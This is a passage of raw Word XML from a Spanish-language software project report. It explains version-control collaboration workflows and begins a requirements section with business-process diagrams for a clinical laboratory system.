    </w:p>
    <w:p w:rsidR="00245646" w:rsidRDefault="00245646" w:rsidP="0024564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El flujo de trabajo de un sistema de control de versiones indica cómo se relacionan los distintos usuarios para colaborar entre sí en la consecución de los objetivos del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437E6D" w:rsidRDefault="00245646" w:rsidP="00437E6D">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 xml:space="preserve">En los sistemas de control de versiones centralizados el diseño del sistema restringe la forma en que los distintos usuarios colaboran entre sí. Sin </w:t>
      </w:r>
      <w:r w:rsidR="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>embargo,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> en los sistemas de control de versiones distribuidos hay mucha más flexibilidad en la forma de colaborar ya que cada desarrollador puede tanto contribuir como recibir contribuciones. Hay distintos flujos de trabajo, donde cada uno se adapta mejor a cierto tipo de proyectos. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00437E6D" w:rsidRDefault="00245646" w:rsidP="00437E6D">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
        </w:rPr>
        <w:t>Flujo de trabajo centralizado</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRDefault="00245646" w:rsidP="0024564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En el flujo de trabajo centralizado (en inglés</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Centralized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Workflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) cada desarrollador es un nodo de trabajo. Por otro </w:t>
      </w:r>
      <w:r w:rsidR="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lado,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay un repositorio remoto central que funciona a modo de punto de sincronización. Todos los nodos de trabajo operan en pie de igualdad sobre el repositorio remoto central.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRDefault="00245646" w:rsidP="0024564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Si se trata de un sistema de control de versiones distribuido cada nodo de trabajo consiste en un repositorio local privado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437E6D" w:rsidRDefault="00245646" w:rsidP="00437E6D">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 xml:space="preserve">Una desventaja de este modo de trabajo es </w:t>
      </w:r>
      <w:r w:rsidR="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>que,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> si dos usuarios clonan desde un punto central, y ambos hacen cambios; tan solo el primero que envíe sus cambios lo podrá hacer limpiamente. El segundo desarrollador deberá fusionar previamente su trabajo con el del primero, antes de enviarlo, para evitar </w:t>
      </w:r>
      <w:r w:rsidR="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sobrescribir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> los cambios del primero. Es decir, es </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>necesario hacer un paso previo ya que no se pueden subir cambios no directos (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>non-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">-forward </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>changes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437E6D" w:rsidRPr="00437E6D" w:rsidRDefault="00245646" w:rsidP="00437E6D">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
        </w:rPr>
        <w:t>Flujo de trabajo con un Gestor de Integraciones</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00437E6D" w:rsidRDefault="00245646" w:rsidP="00437E6D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="336" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>En el flujo de trabajo con un Gestor de Integraciones (en inglés</w:t>
      </w:r>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Integration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">-Manager </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Workflow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) en el que cada desarrollador tiene acceso de escritura a un repositorio propio público y acceso de lectura a los repositorios públicos de todos los demás usuarios. Por otro </w:t>
      </w:r>
      <w:r w:rsidR="00437E6D" w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lado,</w:t>
      </w:r>
      <w:r w:rsidRPr="00437E6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay un repositorio canónico, representante 'oficial' del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRDefault="00245646" w:rsidP="0024564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Para contribuir en estos proyectos cada desarrollador crea su propio clon público del repositorio canónico y envía sus cambios (realizados en un repositorio privado) a él. Para 'subir' sus cambios al repositorio canónico cada desarrollador tiene que realizar una petición a la persona gestora del mismo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRDefault="00245646" w:rsidP="00437E6D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="336" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rStyle w:val="mw-headline"/>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="265F65" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-BO" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>La principal ventaja de esta forma de trabajar es que puedes continuar trabajando, y la persona gestora del repositorio canónico podrá recuperar tus cambios en cualquier momento. Las personas colaboradoras no tienen por qué esperar a que sus cambios sean incorporados al proyecto, cada cual puede trabajar a su propio ritmo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00437E6D" w:rsidRDefault="00437E6D" w:rsidP="00437E6D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="336" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00245646" w:rsidRPr="00245646" w:rsidRDefault="00245646" w:rsidP="00245646">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00437E6D" w:rsidRDefault="00437E6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="262626" w:themeColor="text1" w:themeTint="D9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D11E70" w:rsidRDefault="00D11E70" w:rsidP="00D11E70">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Captura de Requisitos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="00EE696D" w:rsidRDefault="00746B31" w:rsidP="000D0C41">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc422314675"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="34" w:name="_Toc454371300"/>
      <w:r w:rsidR="00CF0096">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Modelo d</w:t>
      </w:r>
      <w:r w:rsidR="00CF0096" w:rsidRPr="00EE696D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e Negocio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
      </w:pPr>
      <w:r>
        <w:t>Representa cada proceso dentro de un laboratorio clínico, especificando las actividades (paso a paso) en cada uno de ellos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="007E1287" w:rsidP="00CF0096">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc454371301"/>
      <w:r>
        <w:t>Identificación de P</w:t>
      </w:r>
      <w:r w:rsidR="00746B31">
        <w:t>rocesos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="007B335D" w:rsidRDefault="00746B31" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Proceso de Gestión de Análisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:r w:rsidRPr="00764B04">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="462D3922" wp14:editId="4FF5A252">
            <wp:extent cx="5768709" cy="4873925"/>
            <wp:effectExtent l="0" t="0" r="381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1432" cy="4876226"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="00FF7A39" w:rsidRDefault="00746B31" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso de Registro de Plantel M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y Usuarios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:r w:rsidRPr="005A7B4E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D60FCE2" wp14:editId="2CD21C74">
            <wp:extent cx="5612130" cy="3370316"/>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370316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso de Recepción de Paciente</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="007B335D" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="139A6A61" wp14:editId="25EFD5B8">
            <wp:extent cx="4775779" cy="7772400"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="15" name="Imagen 15" descr="https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-xpf1/v/t34.0-12/11072125_10206392096382851_1308270851_n.jpg?oh=2d5e7fb6578adc4f8c30674f22bf2009&amp;oe=5512A0A1&amp;__gda__=1427274096_52c8668124a6a2917b3993e3969755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fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-xpf1/v/t34.0-12/11072125_10206392096382851_1308270851_n.jpg?oh=2d5e7fb6578adc4f8c30674f22bf2009&amp;oe=5512A0A1&amp;__gda__=1427274096_52c8668124a6a2917b3993e39697558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2109" cy="7782701"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="00560CE9" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso de Obtención de Muestras</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="007B335D" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:r w:rsidRPr="009A41E6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CE6BC72" wp14:editId="3AD861FE">
            <wp:extent cx="5612130" cy="5172710"/>
            <wp:effectExtent l="0" t="0" r="762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5172710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRPr="009A41E6" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso de Parametrización de Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="00560CE9" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A341B6D" wp14:editId="5C0CE961">
            <wp:extent cx="5581015" cy="7228840"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="20" name="Imagen 20" descr="https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-xpa1/v/t34.0-12/11081852_10153175235339844_519893021_n.jpg?oh=b1d6310033f58a5751964810fc8c61af&amp;oe=551271B8&amp;__gda__=1427201769_1387cc5e360145ac5dfbc3cd280ca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fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-xpa1/v/t34.0-12/11081852_10153175235339844_519893021_n.jpg?oh=b1d6310033f58a5751964810fc8c61af&amp;oe=551271B8&amp;__gda__=1427201769_1387cc5e360145ac5dfbc3cd280ca9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015" cy="7228840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="003C3586" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso de Visualización de Resultados Online</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="0000366A" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:r w:rsidRPr="00E4459E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="766224B2" wp14:editId="2E26C789">
            <wp:extent cx="4758858" cy="7425558"/>
            <wp:effectExtent l="0" t="0" r="381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882" cy="7431836"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="007E1287">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Proceso de</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC48ED">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Emisión de Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31">
      <w:r w:rsidRPr="0090329F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C1AAD0" wp14:editId="40C2B173">
            <wp:extent cx="5612130" cy="700024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7000240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="00746B31" w:rsidP="00746B31"/>
    <w:p w:rsidR="00746B31" w:rsidRDefault="007E1287" w:rsidP="00746B31">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc422314676"/>
      <w:bookmarkStart w:id="37" w:name="_Toc454371302"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Modelo de Dominio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="00746B31" w:rsidRPr="00746B31" w:rsidRDefault="00B27B46" w:rsidP="00746B31">
      <w:r w:rsidRPr="000D0C41">
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="081E51FC" wp14:editId="0E3BF5C9">
            <wp:extent cx="7828386" cy="5038227"/>
            <wp:effectExtent l="4445" t="0" r="571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7832919" cy="5041144"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF05EF" w:rsidRDefault="00AF05EF" w:rsidP="00AF05EF">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc454371303"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Identificar Actores y Casos De Uso</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
